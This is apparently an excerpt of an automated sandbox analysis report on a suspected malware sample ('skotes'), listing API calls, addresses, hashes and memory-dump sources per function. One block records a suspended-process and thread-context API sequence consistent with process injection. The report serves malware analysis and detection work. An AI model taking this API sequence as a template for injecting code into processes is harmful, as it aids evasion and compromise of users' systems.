                    • Instruction ID: 25b8a05e2f5ca2221b1379c0d184bf5d223b3dfc1bbea06bdebe58c70b0e8399
                    • Opcode Fuzzy Hash: 0216fdfb454eb06baf423f39605ed81fdf4b3bfecdd5e7f155feb547e108ed6f
                    • Instruction Fuzzy Hash: 98313571B002058BEB08DF78CD8879CBB62EB86314F24862EE014F73D6C73E89908759
                    APIs
                    • GetFileAttributesA.KERNELBASE(00000000), ref: 0040A07C
                    • Sleep.KERNELBASE(00000064,?), ref: 0040A963
                    • CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981
                    • GetLastError.KERNEL32 ref: 0040A989
                    • GetLastError.KERNEL32 ref: 0040A99A
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$AttributesCreateFileMutexSleep
                    • String ID:
                    • API String ID: 2742703886-0
                    • Opcode ID: 88e878ab482da15b5161df7b52c4b1a5f7044177cc81b821c3be18370bdf11dc
                    • Instruction ID: 2913f941f3630a9fa7767d0b601c4b6f769c1fb87bf52926f0cd03d72d2447b6
                    • Opcode Fuzzy Hash: 88e878ab482da15b5161df7b52c4b1a5f7044177cc81b821c3be18370bdf11dc
                    • Instruction Fuzzy Hash: EA313871B002049BEB08CF78CD8879CBB72EB86314F24832EE014AB3D5C77E5990875A
                    APIs
                    • GetFileAttributesA.KERNELBASE(00000000), ref: 0040A1B1
                    • Sleep.KERNELBASE(00000064,?), ref: 0040A963
                    • CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981
                    • GetLastError.KERNEL32 ref: 0040A989
                    • GetLastError.KERNEL32 ref: 0040A99A
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$AttributesCreateFileMutexSleep
                    • String ID:
                    • API String ID: 2742703886-0
                    • Opcode ID: b58d3c0f583deb09c94fa5bacb6b39bd66a3bd1ce796c2c9e13856887924e195
                    • Instruction ID: 0d6a49526a1327b253fe5098ec14963d2f5facb1360acb2292d3cc5b5202a49d
                    • Opcode Fuzzy Hash: b58d3c0f583deb09c94fa5bacb6b39bd66a3bd1ce796c2c9e13856887924e195
                    • Instruction Fuzzy Hash: 06313871B002449BEB08CB78DD8979CBB72AB86314F24826EE010BB3D1D73E4990875A
                    APIs
                    • GetFileAttributesA.KERNELBASE(00000000), ref: 0040A2E6
                    • Sleep.KERNELBASE(00000064,?), ref: 0040A963
                    • CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981
                    • GetLastError.KERNEL32 ref: 0040A989
                    • GetLastError.KERNEL32 ref: 0040A99A
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$AttributesCreateFileMutexSleep
                    • String ID:
                    • API String ID: 2742703886-0
                    • Opcode ID: 6e94145214bef973793fe427d23932e970127bf20b86fb382447409c3aa88be8
                    • Instruction ID: d4318adec2a0b0823987713c0d9e9fbe03db99375cc119bf87b2444f6c438343
                    • Opcode Fuzzy Hash: 6e94145214bef973793fe427d23932e970127bf20b86fb382447409c3aa88be8
                    • Instruction Fuzzy Hash: B5314C71B002449BDB18CB7CDD8879CBB72AB86314F24832EE415B77D5C77E9990871A
                    APIs
                    • GetFileAttributesA.KERNELBASE(00000000), ref: 0040A41B
                    • Sleep.KERNELBASE(00000064,?), ref: 0040A963
                    • CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981
                    • GetLastError.KERNEL32 ref: 0040A989
                    • GetLastError.KERNEL32 ref: 0040A99A
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$AttributesCreateFileMutexSleep
                    • String ID:
                    • API String ID: 2742703886-0
                    • Opcode ID: 3cb95feb25ffbecb475e2b992bbf89ef279567f43ac2449aabbd215152769c76
                    • Instruction ID: 177968d54e80b63577a18a42233b898a1cac99c92728e3749c20e12237d1c7da
                    • Opcode Fuzzy Hash: 3cb95feb25ffbecb475e2b992bbf89ef279567f43ac2449aabbd215152769c76
                    • Instruction Fuzzy Hash: 8F314B71B002009BEB08DB78CD8D79DB772EF85314F24822EE010A73D6D7BD5990875A
                    APIs
                    • GetFileAttributesA.KERNELBASE(00000000), ref: 0040A550
                    • Sleep.KERNELBASE(00000064,?), ref: 0040A963
                    • CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981
                    • GetLastError.KERNEL32 ref: 0040A989
                    • GetLastError.KERNEL32 ref: 0040A99A
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$AttributesCreateFileMutexSleep
                    • String ID:
                    • API String ID: 2742703886-0
                    • Opcode ID: 2490790a2c4424bfcbf128f3201736b9eb669bf7d92e41271162f2c2d877e618
                    • Instruction ID: bda3843c8d2f1f79bae2c8a69c6dbbf832d70b156e41472656c3fc89fe85ee9b
                    • Opcode Fuzzy Hash: 2490790a2c4424bfcbf128f3201736b9eb669bf7d92e41271162f2c2d877e618
                    • Instruction Fuzzy Hash: 73310A71B002049BEB08DB78DD8979CBB72EF85318F24862EE054B73D5C77D9991871A
                    APIs
                    • GetFileAttributesA.KERNELBASE(00000000), ref: 0040A685
                    • Sleep.KERNELBASE(00000064,?), ref: 0040A963
                    • CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981
                    • GetLastError.KERNEL32 ref: 0040A989
                    • GetLastError.KERNEL32 ref: 0040A99A
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$AttributesCreateFileMutexSleep
                    • String ID:
                    • API String ID: 2742703886-0
                    • Opcode ID: 9b1e1d051d91ed0d094286e0445d7252053b3376e1c5daa723f50c0f565058f3
                    • Instruction ID: f2407fc4001374e8d630a20de8f378bb700d47030947fa9166f468cfde575e45
                    • Opcode Fuzzy Hash: 9b1e1d051d91ed0d094286e0445d7252053b3376e1c5daa723f50c0f565058f3
                    • Instruction Fuzzy Hash: FC310871B002049BEB08DB78CD8979DBB72EB86314F24C62EE054A73D5C77E8990875A
                    APIs
                    • GetFileAttributesA.KERNELBASE(00000000), ref: 0040A7BA
                    • Sleep.KERNELBASE(00000064,?), ref: 0040A963
                    • CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981
                    • GetLastError.KERNEL32 ref: 0040A989
                    • GetLastError.KERNEL32 ref: 0040A99A
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$AttributesCreateFileMutexSleep
                    • String ID:
                    • API String ID: 2742703886-0
                    • Opcode ID: fcc2e177b4f15e377919ebb87834cd56c3ea86209294201e69ca8b900a953689
                    • Instruction ID: 708ac7c539b84bc56d0f911c974f1a8df7384db8e58729bb082dec4ca25a47f8
                    • Opcode Fuzzy Hash: fcc2e177b4f15e377919ebb87834cd56c3ea86209294201e69ca8b900a953689
                    • Instruction Fuzzy Hash: 1C310A72B002048BEB08DB78CE8979DBB72AB85314F24C62EE014B73D5D73D8991871A
                    APIs
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: __wsopen_s
                    • String ID:
                    • API String ID: 3347428461-0
                    • Opcode ID: b179973e2016f215b0ef3759c58dae6fc3af94d4a8fe8fa67ffe374620a294ef
                    • Instruction ID: a66abbd6648e96b8c426010f02d88ffd1877682ffd29169a79776235427ef3c3
                    • Opcode Fuzzy Hash: b179973e2016f215b0ef3759c58dae6fc3af94d4a8fe8fa67ffe374620a294ef
                    • Instruction Fuzzy Hash: 551118B1A0420AAFCB05DF59E94199B7BF4EF48304F04406AF805AB351D670DD21DB69
                    APIs
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: 4bf55d96b3124123fa5b4d90ff1f5c8938864954e94b728903c20be6fe2521f5
                    • Instruction ID: caf716810d89335458da247e87b67cbe6bddd4a27f6768b685f1195746756c03
                    • Opcode Fuzzy Hash: 4bf55d96b3124123fa5b4d90ff1f5c8938864954e94b728903c20be6fe2521f5
                    • Instruction Fuzzy Hash: FC018872C0411ABECF02AFB9DC0279F7FF59B08314F21916BE818E2191DA358A44D789
                    APIs
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: 0da8171cac030f6b45925a7c5248a00485fab8e2398974f4a4f83c3fb58f0ae8
                    • Instruction ID: c9b0d8fa498f0fd219daed50f945327353b6da4e75b16bd436644be4f456858a
                    • Opcode Fuzzy Hash: 0da8171cac030f6b45925a7c5248a00485fab8e2398974f4a4f83c3fb58f0ae8
                    • Instruction Fuzzy Hash: DE014F72C01159BFDF01EFE88C01AEE7FB5AF08314F14416AF914F2161E6358A65DB95
                    APIs
                    • RtlAllocateHeap.NTDLL(00000000,708790F9,?), ref: 0043B07D
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: e8d29c579fbe0dbb9990d3024b7ea32ec305f13d6327c1f4be71044e81a6531e
                    • Instruction ID: 1cb01c0e060f4cd42e57510be9b20f0956e8337f8686784a9c24bf025648d394
                    • Opcode Fuzzy Hash: e8d29c579fbe0dbb9990d3024b7ea32ec305f13d6327c1f4be71044e81a6531e
                    • Instruction Fuzzy Hash: C7E0E53510121596E73836369C02B5FB768DB493A0F153223EFE4D22A1DB58CC0081ED
                    APIs
                    • CreateFileW.KERNELBASE(00000000,00000000,?,00441B65,?,?,00000000,?,00441B65,00000000,0000000C), ref: 00441792
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: efd75a4b3e0d0f44703b7e6113a489f3725145c46bff7276ab7cb2ca30d4afc5
                    • Instruction ID: 728716dea2d8701cc34847fc6eeab83fc4e7ccc419190b368175d6442f09313a
                    • Opcode Fuzzy Hash: efd75a4b3e0d0f44703b7e6113a489f3725145c46bff7276ab7cb2ca30d4afc5
                    • Instruction Fuzzy Hash: 10D06C3201020DBBDF028F84DC06EDE3BAAFB48715F014150BA1856020C732E861AB94
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006D0C06
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668968733.00000000006D0000.00000040.00000020.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_6d0000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction ID: 2d56170e34fcbe04c4c8121118d37db47fd9786c56b7b4a9c8031bddfee4e9e6
                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction Fuzzy Hash: D0112B79A00208EFDB01DF98CA85E98BBF5AF08350F058095F9489B362D375EA50DB84
                    APIs
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001C.00000002.4668594111.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 0000001C.00000002.4668594111.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_400000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 094e8a0f3bce6c07c61031f93608600f6c151f0e61d94669401ba84417781954
                    • Instruction ID: d25f59c851155858dfca88a8e66668f5de182f8ed3116e5afb4592376e8681e2
                    • Opcode Fuzzy Hash: 094e8a0f3bce6c07c61031f93608600f6c151f0e61d94669401ba84417781954
                    • Instruction Fuzzy Hash: 00F02171E00A00ABC700BB698D06B4E7B74EB42BA4F90026EE820272D1EB781A0047DB
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00627334
                    • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00627392
                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 006273AB
                    • GetThreadContext.KERNEL32(?,00000000), ref: 006273C0
                    • ReadProcessMemory.KERNEL32(?,00458DF8,?,00000004,00000000), ref: 006273E0
                    Strings
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668844085.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_620000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$AllocContextCreateFileMemoryModuleNameReadThreadVirtual
                    • String ID: VUUU
                    • API String ID: 338953623-2040033107
                    • Opcode ID: 8d52878efc5f8f8a1e952e44b6c95f7c24c53631ccf418eeef8ebfb25720e601
                    • Instruction ID: ff89f24e04d4946e481ec864403e8c9f73b834c6bf864c7aa3da903e65bc9ec7
                    • Opcode Fuzzy Hash: 8d52878efc5f8f8a1e952e44b6c95f7c24c53631ccf418eeef8ebfb25720e601
                    • Instruction Fuzzy Hash: 0751D171644300AFD750AB64DC06F9ABBE9FF84B15F004529FA44EB2D1DBB4E904CB9A
                    APIs
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0064117D
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 006411C9
                      • Part of subcall function 006428C4: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 006429B7
                    • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00641235
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00641251
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 006412A5
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 006412D2
                    • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00641328
                    Strings
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668844085.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_620000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
                    • String ID: (
                    • API String ID: 2943730970-3887548279
                    • Opcode ID: 97f5cfb5054145a50c69719e5e21d6391f3292fc1eddb95c28002738003bc8bd
                    • Instruction ID: 6ab1d55cd1d390583fcdea63687da063726d8b02424110e9251d7717529da9a7
                    • Opcode Fuzzy Hash: 97f5cfb5054145a50c69719e5e21d6391f3292fc1eddb95c28002738003bc8bd
                    • Instruction Fuzzy Hash: E6B19D70A00615AFDB18CF68D990ABEBBB6FF45700F14416DE801AB790D770BD81CBA4
                    APIs
                    • __EH_prolog3.LIBCMT ref: 0063F0CD
                    • _SpinWait.LIBCONCRT ref: 0063F123
                    • Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 0063F12F
                    • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0063F148
                    • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0063F176
                    • Concurrency::Context::Block.LIBCONCRT ref: 0063F198
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668844085.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_620000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::H_prolog3ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
                    • String ID:
                    • API String ID: 1888882079-0
                    • Opcode ID: 51f1a6270a472bcdd30247f4592d3322b934ddd74063de143c259ec6416e4012
                    • Instruction ID: 3f61cdbccb3bcce6b56c388ea07188eb1d7f71710a5070c7c2f777740f397459
                    • Opcode Fuzzy Hash: 51f1a6270a472bcdd30247f4592d3322b934ddd74063de143c259ec6416e4012
                    • Instruction Fuzzy Hash: 10219070C00219DADF68EFA4D846AEEB7F2AF15310F60053EE065A62D1EB718A44CBD5
                    APIs
                    • __Mtx_unlock.LIBCPMT ref: 00637138
                    • std::_Rethrow_future_exception.LIBCPMT ref: 00637189
                    • std::_Rethrow_future_exception.LIBCPMT ref: 00637199
                    • __Mtx_unlock.LIBCPMT ref: 0063723C
                    • __Mtx_unlock.LIBCPMT ref: 00637342
                    • __Mtx_unlock.LIBCPMT ref: 0063737D
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668844085.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_620000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_
                    • String ID:
                    • API String ID: 1997747980-0
                    • Opcode ID: 411bbcd3c98b8483f8dc7711dd14b2669908e861b9d7381f1d8c4d8a9dcadb8d
                    • Instruction ID: f694fe413c74282458936556978aa3bd9d728e6fe813409774ede2aa6ebb3251
                    • Opcode Fuzzy Hash: 411bbcd3c98b8483f8dc7711dd14b2669908e861b9d7381f1d8c4d8a9dcadb8d
                    • Instruction Fuzzy Hash: 52C1D2B19046489BDB30DF64C945BAEBBF6EF05310F00452EE816A7782E775AA04CBD1
                    APIs
                    • RegisterWaitForSingleObject.KERNEL32(?,%C,?,00650C8C,000000FF,0000000C), ref: 00640098
                    • GetLastError.KERNEL32(?,00650C8C,?,00430925,?,?,?,?,?,?,00645F15,?), ref: 006400A7
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 006400BD
                    Strings
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668844085.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_620000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastObjectRegisterSingleWait
                    • String ID: %C
                    • API String ID: 2296417588-4291884666
                    • Opcode ID: fbcf708f24b496e530a1d5d1bc838a4ad30d765a2443b3a5aa298535997dd61c
                    • Instruction ID: 5b9c78914336c79b52d5399a1c89eade7118d83d9c6de83ee01e12d8eb721c25
                    • Opcode Fuzzy Hash: fbcf708f24b496e530a1d5d1bc838a4ad30d765a2443b3a5aa298535997dd61c
                    • Instruction Fuzzy Hash: A1F0A03550020AFBDF00EFA5DD45FEE377DAB00B02F200625B620E21D2DA39D6049B64
                    APIs
                    Memory Dump Source
                    • Source File: 0000001C.00000002.4668844085.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_28_2_620000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_unlock$Cnd_broadcastCurrentThread
                    • String ID:
                    • API String ID: 3264154886-0
                    • Opcode ID: d95c55a17dc6c0951bf91651ac23ff9b82cafa9506b18cb5ad1f8234279d2599
                    • Instruction ID: 89ff50456ccfc7fff382e5b123241aef800ea6ae1b74a3c62017c83cb0942e3e
                    • Opcode Fuzzy Hash: d95c55a17dc6c0951bf91651ac23ff9b82cafa9506b18cb5ad1f8234279d2599
                    • Instruction Fuzzy Hash: 5441CFB0901A25DBDB209F64D94879AB7E9FF15320F10452EE815E7782EB39EA04CBC1